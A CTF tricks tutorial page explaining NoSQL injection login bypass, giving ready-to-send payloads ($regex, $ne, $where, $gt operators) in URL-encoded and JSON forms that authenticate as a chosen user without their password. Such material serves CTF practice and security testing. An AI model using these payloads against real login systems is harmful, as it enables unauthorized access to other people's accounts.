> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/nosql-injection/trick-0134.md).

# Targeted NoSQL Injection Login

***

To log in as a specific user when a NoSQL injection vulnerability exists on a login form, you can target the password field while providing a known username. This technique constrains the query to the specified user and uses a regex payload to bypass the password check for *that* user.

Send an HTTP POST request to the login endpoint (e.g., `/login.php`) with the following data in the request body:

```
username=[TARGET_USERNAME]&password[$regex]=.*
```

Replace `[TARGET_USERNAME]` with the username you want to log in as. The `$regex=.*` payload in the password field causes the database to look for the user `[TARGET_USERNAME]` whose password matches any string (`.*`). If successful, you will be authenticated as the targeted user without needing their actual password. This method relies on knowing or being able to guess valid usernames.

This technique can also be used with different operators or data formats. For example, when the login form expects JSON data, the payload might look like this:

```json
{
  "username": "admin",
  "password": { "$regex": ".*" }
}
```

Another common technique involves using the `$ne` (not equal) operator to bypass the password check by asserting that the password field is not null or empty. This can be sent in the request body as:

```
username=admin&password[$ne]=null
```

Or, in JSON format:

```json
{
  "username": "admin",
  "password": { "$ne": null }
}
```

Advanced techniques might involve using the `$where` operator, which allows executing JavaScript code within the query. An example payload using `$where` to check if the password length is greater than 0 could be:

```
username=admin&password[$where]=this.password.length%20%3E%200
```

This technique can also be applied in JSON requests:

```json
{
  "username": "admin",
  "password": { "$where": "this.password.length > 0" }
}
```

This translates to a query condition where the username is 'admin' and the JavaScript expression `this.password.length > 0` evaluates to true, bypassing the need to know the actual password.

Another useful operator for authentication bypass is `$gt` (greater than). By checking if the password field is greater than an empty string, you can effectively bypass the password check, similar to using `$ne=null`. This checks for a non-empty password.

Using `$gt` in a URL-encoded request:

```
username=admin&password[$gt]=""
```

Or in a JSON request:

```json
{
  "username": "admin",
  "password": { "$gt": "" }
}
```

These payloads modify the database query to something equivalent to finding a user where the username matches the target and the password meets the condition specified by the injected operator (e.g., `$regex` matches any string, `$ne` is not null, `$where` evaluates true, or `$gt` is greater than an empty string), effectively ignoring the need for the correct password value.
